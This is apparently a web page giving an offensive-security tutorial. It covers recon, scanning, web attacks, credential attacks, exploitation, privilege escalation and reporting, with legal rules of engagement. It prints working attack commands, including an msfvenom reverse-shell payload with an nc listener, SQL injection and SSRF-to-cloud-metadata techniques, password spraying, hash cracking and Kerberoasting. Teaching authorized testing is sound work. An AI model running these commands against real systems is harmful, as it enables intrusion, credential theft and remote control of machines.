The companion to the Blue Team Defense Manual

Field Manual · Offensive Security

Tom Pearl in a hoodie at a terminal, self-appointed Red Team operator running a scan

Think like the
attacker.

The offensive counterpart to the defense manual. You can't protect a system you don't know how to break — so this walks the attacker's kill chain, from recon to report. Everything here is for authorized testing, CTFs and your own lab.

Orientation

Rules of engagement

Read this first. The difference between a penetration tester and a criminal is not skill — it's permission.

Legal disclaimer — read before you touch anything

This guide is for education and authorized security testing only. Ethical hacking is legal when — and only when — you have explicit, written permission from the owner of the system you are testing, or when you are working entirely inside systems you own.

Practising these techniques is legal on: your own machines and networks; intentionally vulnerable lab targets (VulnHub, HackTheBox, TryHackMe, PortSwigger Web Security Academy, OWASP Juice Shop, Metasploitable, DVWA); sanctioned CTF competitions; and paid penetration-testing engagements covered by a signed scope and rules-of-engagement document.

Running any of this against a system you do not own or are not contracted to test — even "just to look" — is a crime in most countries (Computer Fraud and Abuse Act in the US, Computer Misuse Act in the UK, and equivalents elsewhere). No scope, no test. The author and tompearl.com accept no liability for misuse; you alone are responsible for staying inside the law.

Before every engagement

Scope — exactly which hosts, IPs, domains and apps are in bounds, and which are explicitly out.
Authorization — a signed engagement letter / rules-of-engagement document with dates and a get-out-of-jail contact.
Rules — allowed hours, whether social engineering or DoS is permitted, and how to stop if you cause an outage.

If you can't point to written permission for a target, it is not a target. Spin up a lab instead — you'll learn more and sleep better.

Unlearn

Attacker myths

Beliefs that get beginners caught, burned, or stuck. Drop these now.

“A VPN or Tor makes what I'm doing legal.”

Anonymity is not authorization. Hiding your source IP doesn't change whether you had permission — it just changes how the sentencing reads.

“Real hacking is dropping zero-days like in the movies.”

Almost every real compromise is a stolen password, an unpatched box, or a misconfiguration. Boring beats clever.

“Automated scanners will find everything.”

Scanners find the obvious. Chained logic flaws, business-logic abuse and access-control gaps need a human brain.

“Getting a shell is the goal.”

The goal is a clear, reproducible report that lets the defenders fix it. A shell nobody can act on is worthless.

“Louder and faster is better.”

Aggressive scans crash fragile systems and get you blocked. Understand the target before you hammer it.

Kill chain · Phase 1

Reconnaissance

Map the attack surface before you throw a single packet. Most of the work happens here.

What it achieves

Turns a company name into a list of domains, subdomains, IP ranges, exposed services, technologies and people — the raw material every later phase depends on. A thorough map is worth more than a fast exploit.

PassiveTouch nothing, learn everything
  • Subdomains from certificate transparency — every HTTPS cert a company issues is logged publicly. crt.sh hands you the list without sending one packet to the target.
  • OSINT the people: guess the email format from LinkedIn ([email protected]), harvest names to build a username list for later spraying.
  • Find the real IP ranges the org owns via WHOIS / ASN lookups, so you scan their infra and not their CDN.
example · CT logscurl -s "https://crt.sh/?q=%25.acme.com&output=json" | jq -r '.[].name_value' | sort -u # pulls every subdomain ACME ever issued a cert for — no contact with ACME
ActiveNow you make contact
  • Resolve and probe the discovered hosts: which answer on 80/443, what's the page title, what tech stack.
  • Virtual hosts: one IP often serves ten sites — admin.acme.com may only respond if you send the right Host: header. The default page is rarely the interesting one.
  • Fingerprint versions (server, framework, CMS) so you can line up known CVEs before you touch the exploitation phase.
example · probe live hostshttpx -l subdomains.txt -title -tech-detect -status-code -o live.txt # in: 400 subdomains → out: only the live ones, with title + detected tech

Kill chain · Phase 2

Scanning & enumeration

From "these hosts exist" to "these exact services, versions and doors are open".

What it achieves

Identifies open ports, running services and their versions, then digs into each service for shares, users, endpoints and default credentials. Enumeration is where engagements are won — spend the time.

Port & serviceFind the doors
  • Full port scan, then version + default scripts on whatever answers. Scan all 65535 ports — the SSH admin left on 2222 is exactly what you're looking for.
  • Never trust the port number. Port 8080 might be Jenkins, might be a dev API — fingerprint what's actually listening.
example · nmapnmap -sV -sC -p- -oA acme-scan 10.10.10.5 # -p- all 65535 ports -sV service versions -sC default scripts # -oA save in all formats (you'll paste this straight into the report)
Deep enumerationWork each service
  • Web: brute-force directories and endpoints, then read the page source and JS bundles — hardcoded API keys and hidden /admin routes live there.
  • SMB / NFS: list shares and try null-session (anonymous) access. A world-readable \\SERVER\HR$ leaks more than any exploit.
  • Match versions to CVEs — but verify by hand before you believe a scanner's "vulnerable" flag; false positives waste everyone's time.
example · content discoveryffuf -u https://acme.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,301,302 # FUZZ is swapped for each wordlist entry; -mc keeps only these status codes

Kill chain · Web apps

Web application attacks

Where most real-world bug bounties and breaches live. Learn the OWASP Top 10 by breaking it in a lab.

What it achieves

Turns a login form or search box into data theft, account takeover or code execution. The classics — injection, broken access control, and authentication flaws — still dominate real findings.

The classicsLearn these cold
  • Broken access control / IDOR — the #1 real-world web bug. You're logged in as user 1001; change the ID and read user 1002's data. Test authorization, not just login.
  • SQL injection — untrusted input reaching the database. A login that builds ... WHERE user='$u' falls to ' OR '1'='1. Learn why parameterized queries kill it.
  • Cross-site scripting (XSS) — your input rendered as code in another user's browser (reflected, stored, DOM). Steals sessions and defaces pages.
  • Authentication flaws — guessable reset tokens, no rate limit on login, session IDs that don't rotate.
IDOR in one line: the app loads your invoice at /api/invoice?id=1001. Try id=1002. If it returns someone else's invoice, that's a critical finding — no exploit tooling needed.
example · confirm + dump SQLisqlmap -u "https://acme.com/item?id=1" --batch --dbs # --batch answers prompts automatically, --dbs lists databases once injection confirms # reflected XSS test payload:
Going deeperChain for impact
  • SSRF: make the server fetch a URL you control. On AWS that often means http://169.254.169.254/latest/meta-data/ → cloud credentials → game over.
  • File upload → RCE: an "avatar" upload that accepts shell.php and serves it back executable is a straight line to a shell.
  • Business-logic flaws: set quantity to -1 and get a refund, skip the payment step, replay a coupon. No scanner finds these — a human reading the flow does.
  • Chain low bugs into one high-impact story. Self-XSS + CSRF + a login flaw can equal full account takeover. Impact, not count, is what lands.

Best place to practise

PortSwigger's Web Security Academy is free, world-class, and legal to hammer as hard as you like. Pair it with OWASP Juice Shop and DVWA running locally.

Kill chain · Credentials

Password & credential attacks

Stolen and weak credentials remain the single most common way in. Know how they fall.

What it achieves

Converts captured hashes or a login prompt into working credentials — then reuses them everywhere. Credential reuse is what turns one weak password into full domain compromise.

OnlineAgainst a live service
  • Password spraying: ONE password (Autumn2026!) against EVERY account. One try each dodges the lockout that fires after three — that's why it beats brute force.
  • Credential stuffing: replay email:password pairs from breach dumps. People reuse, so a LinkedIn leak unlocks their corporate VPN.
  • Watch lockouts and alerting. Hammer one account and you lock it out + light up the SOC. Slow and wide stays quiet.
example · spray one password, whole domainnetexec smb 10.10.10.0/24 -u users.txt -p 'Autumn2026!' --continue-on-success # one attempt per user = under the lockout threshold; flags every valid hit
OfflineOnce you have the hashes
  • Crack captured hashes on a GPU. A wordlist (rockyou) plus a rule set (best64) turns Password1P@ssw0rd1! in seconds — far faster than raw brute force.
  • The hash type decides your fate: MD5/NTLM fall in minutes; bcrypt/argon2 can take years. That contrast is the defensive lesson — see the Blue Team manual.
  • Pass-the-hash: in Windows/AD you often skip cracking entirely — the NTLM hash itself authenticates you as that user.
example · hashcat NTLMhashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule # -m 1000 = NTLM -r = mutate each word (add digits, swap letters, capitalise)

Kill chain · Phase 3

Exploitation

Turning a known weakness into a foothold — carefully, and inside scope.

What it achieves

Gets you your first code execution or session on a target. The professional's rule: understand what an exploit does before you run it, so you don't crash a production system you were hired to protect.

MethodDeliberate, not reckless
  • Match a verified service/version to a known CVE, then read the exploit before firing it — know its side effects.
  • Prefer the least-invasive path that proves impact. You're demonstrating risk, not maximizing damage.
  • Test volatile exploits in a lab replica first when the target is fragile or production.
FootholdGet and keep a session
  • Catch a reverse shell (target connects back to you — beats a bind shell through NAT/firewalls), then upgrade the dumb shell to a full interactive TTY.
  • Document as you go: exact command, payload, timestamp. If it's not reproducible, it's not a finding.
  • Add persistence only if the ROE allows it, and list every mechanism so the client can rip it back out.
example · reverse shell payloadmsfvenom -p linux/x64/shell_reverse_tcp LHOST=10.8.0.1 LPORT=443 -f elf -o s.elf nc -lvnp 443 # your listener: catches the shell when s.elf runs on the target # upgrade the shell once you're in: python3 -c 'import pty;pty.spawn("/bin/bash")'

Kill chain · Phase 4

Privilege escalation

From a low-privilege foothold to root / SYSTEM / domain admin.

What it achieves

Takes the limited shell you landed and turns it into full control of the host, by abusing misconfigurations the sysadmin never noticed. Enumeration wins here just like everywhere else.

LinuxCommon wins
  • Check sudo -l first. If you can run even vi or find as root, GTFOBins gives you the one-liner to a root shell.
  • SUID binaries and cron jobs: a root-owned script that's world-writable, or an odd SUID binary, is a free escalation.
  • Kernel exploit = last resort. A vulnerable kernel version works but can panic the box — never your first move on a live system.
example · quick linux enumsudo -l # what can I run as root? find / -perm -4000 -type f 2>/dev/null # every SUID binary ./linpeas.sh | tee peas.txt # or let PEASS-ng find it all for you
Windows / ADWhere the domain falls
  • Local: unquoted service paths, weak service permissions, token abuse (whoami /privSeImpersonate is a classic win via "potato" attacks).
  • Active Directory: BloodHound draws the graph from your low-priv user to Domain Admin — Kerberoasting, ACL abuse and delegation are the usual edges.
  • Loot and reuse: one local-admin password reused across the fleet (dumped from memory with Impacket/mimikatz) unlocks the whole network.
example · kerberoast + map pathsimpacket-GetUserSPNs acme.local/jdoe:'Autumn2026!' -request -outputfile hashes.txt # cracks offline in hashcat (-m 13100); feed BloodHound to see the path to DA

Kill chain · Phase 5

Post-exploitation & lateral movement

Proving business impact — carefully, and only as far as scope allows.

ObjectiveDemonstrate, don't destroy
  • Show impact, not chaos: reaching the crown-jewel data or domain admin proves risk — you don't need to exfiltrate or break anything to make the point.
  • Pivot only in scope. Reaching a new network segment can put you out of bounds — check the ROE before you move.
  • Log every host you touch so the client can verify and clean up afterward.
CleanupLeave it as you found it
  • Remove your artifacts: tools, shells, added accounts and persistence — and hand the client a list of everything you placed.
  • Restore any changes to configs or data. The engagement ends with the environment exactly as you found it.

Kill chain · People

Social engineering

The human layer — the most reliable way in, and the most sensitive to test. Only ever with explicit sign-off.

What it achieves

Bypasses every technical control by convincing a person to hand over access. Because it targets real people, it demands the strictest authorization and the most care.

Techniques (concept)Know how they work
  • Phishing & pretexting: a believable message plus manufactured urgency to harvest credentials or an MFA approval.
  • Vishing & impersonation: a phone call posing as IT or a vendor — still one of the highest-success techniques.
  • Physical pretexting: tailgating and "I'm from the vendor" badge tests, when the engagement covers physical entry.

Extra rules for the human layer

Social engineering must be explicitly named in the scope, target roles rather than individuals where possible, and never involve real harm, threats, or handling of anyone's genuine personal data beyond what the test requires. When in doubt, leave it out.

The actual deliverable

Reporting & remediation

The report is the product. A brilliant exploit nobody can understand or fix is a failure.

What every finding needs

Title & severity (with CVSS or a clear risk rating), a plain-English impact statement, step-by-step reproduction with evidence, the affected assets, and a concrete remediation the team can actually act on.

DoMake it usable
  • Write for two audiences: an executive summary for leadership, technical detail for the engineers who'll fix it.
  • Prioritize by real risk — likelihood × impact in this environment, not a raw scanner score.
  • Offer a retest. Verifying the fix is part of the job and where you build trust.
The mindsetYou're on their side
  • Red team exists to make the blue team stronger. Read the Defense Manual — every attack here maps to a control there.
  • Responsible disclosure for anything you find outside an engagement: report it privately, give time to fix, never weaponize.

TL;DR

Engagement checklist

The non-negotiables of a professional, legal test.

Pick your class

Operator loadouts

New to the field? Grab a starter kit for the path you're learning — every tool in it lives in the Toolbox below.

The Recon Scout

Lvl 1 · Mapping

Learn to see everything before you touch anything.

Scan
Nmap
Subdomains
Amass / crt.sh
Web probe
httpx
Content
ffuf

▲ Field upgradeAdd Shodan to find exposed services without scanning.

The Web Breaker

Lvl 2 · AppSec

Bug bounties and web pentests start here.

Fuzz
ffuf
SQLi
sqlmap
Scan
Nuclei

▲ Field upgradeRead every request in Burp by hand — automation misses logic flaws.

The Network Operator

Lvl 3 · Internal / AD

Internal networks and Active Directory.

Framework
Metasploit
SMB/AD
NetExec
Cracking
hashcat
Privesc
PEASS-ng

▲ Field upgradePractice the full chain on HackTheBox Pro Labs before any real internal.

Arsenal

Toolbox

The standard, mostly free / open-source offensive toolkit — most ship with Kali Linux. Each note says what phase it serves. Lab and authorized targets only.

Recon & enumeration

Nmap

The standard port scanner and service/version fingerprinter, with a huge scripting engine.

ScanningVisit
Amass

Deep subdomain and attack-surface mapping from passive and active sources.

ReconVisit
httpx

Fast probe to find live web servers, titles and technologies across many hosts.

ReconVisit
Recon-ng

Modular OSINT framework for structured passive reconnaissance.

ReconVisit
Shodan

Search engine of internet-exposed devices — recon without touching the target.

ReconVisit

Before you point any of this at a host

These tools are neutral — the same scanner defends and attacks. What makes their use legal is authorization for that specific target. Against your own lab: go wild. Against anything else without written scope: it's an offence, full stop. See the rules of engagement.

Web application

Burp Suite

The web pentester's core proxy — intercept, modify and replay requests. Free Community edition to start.

WebVisit
OWASP ZAP

Fully open-source web proxy and scanner — the free Burp alternative.

WebVisit
ffuf

Fast web fuzzer for directories, endpoints, parameters and virtual hosts.

Web · ReconVisit
sqlmap

Automated detection and exploitation of SQL injection — study its output to learn the technique.

WebVisit
Nuclei

Template-based scanner for known vulnerabilities and misconfigurations at scale.

Scanning · WebVisit

Exploitation & C2

Metasploit

The exploitation framework — modules, payloads and post-exploitation, ideal for learning how exploits work.

ExploitationVisit
msfvenom

Payload generator bundled with Metasploit for crafting reverse shells and stagers.

ExploitationVisit
Exploit-DB / searchsploit

Archive of public exploits; read the code before you ever run one.

ExploitationVisit

Passwords & credentials

hashcat

GPU-accelerated password-hash cracker — wordlists plus rules beat brute force.

CredentialsVisit
John the Ripper

Versatile offline cracker with broad hash-format support.

CredentialsVisit
Hydra

Online login brute-forcer across many protocols — mind lockouts and noise.

CredentialsVisit
NetExec (CME)

Swiss-army knife for SMB/AD — spraying, enumeration and pass-the-hash across a network.

Credentials · ADVisit

Privilege escalation & AD

PEASS-ng (linPEAS / winPEAS)

Enumerates local privilege-escalation paths on Linux and Windows automatically.

Priv-escVisit
BloodHound

Graphs Active Directory attack paths so you can see the route to domain admin.

Priv-esc · ADVisit
Impacket

Python toolkit for Windows/AD protocols — the backbone of pass-the-hash, Kerberoasting and lateral movement.

Post-exploit · ADVisit
GTFOBins / LOLBAS

Reference of trusted binaries abusable for privesc — essential lookup, not a tool.

Priv-escVisit

Platform & distro

Kali Linux

The pentesting distro with hundreds of these tools pre-installed. Run it in a VM.

PlatformVisit
Parrot Security OS

Alternative security distro, lighter than Kali with a similar toolset.

PlatformVisit
Wireshark

Packet analyzer for understanding protocols and spotting cleartext credentials.

AnalysisVisit

Legal practice grounds

PortSwigger Web Security Academy

Free, world-class web-hacking labs from the makers of Burp. Legal to attack all day.

Learning · WebVisit
HackTheBox

Sanctioned vulnerable machines and labs across every skill level.

LearningVisit
TryHackMe

Guided rooms — the friendliest on-ramp for beginners.

LearningVisit
VulnHub

Downloadable vulnerable VMs to attack entirely offline on your own machine.

LearningVisit
OWASP Juice Shop

Deliberately insecure web app covering the whole OWASP Top 10, run locally.

Learning · WebVisit
OffSec / OSCP

The industry-standard hands-on offensive certification and training path.

LearningVisit